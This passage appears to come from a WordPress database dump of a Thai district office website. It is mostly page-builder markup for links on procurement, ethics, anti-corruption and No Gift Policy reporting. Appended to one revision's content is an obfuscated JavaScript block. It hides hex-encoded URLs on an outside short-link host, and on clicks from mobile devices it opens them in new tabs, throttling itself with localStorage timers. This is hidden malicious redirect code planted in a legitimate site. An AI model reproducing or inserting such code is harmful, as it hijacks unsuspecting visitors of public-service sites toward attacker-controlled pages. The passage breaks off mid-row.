href=\"http://pakhaeng.ssk.in.th/?page_id=1059\" data-type=\"page\" data-id=\"1059\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_893939-da\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_893939-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-23 14:39:44','2024-08-23 07:39:44','',871,'http://pakhaeng.ssk.in.th/?p=1070',0,'revision','',0),
(1072,1,'2024-08-30 12:01:12','2024-08-30 05:01:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1540af-66\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[666,668],\"type\":\"carousel\",\"imageRatio\":\"land169\",\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":666,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=666\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ปขก2-1.png\",\"width\":1600,\"height\":900},{\"id\":668,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=668\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.t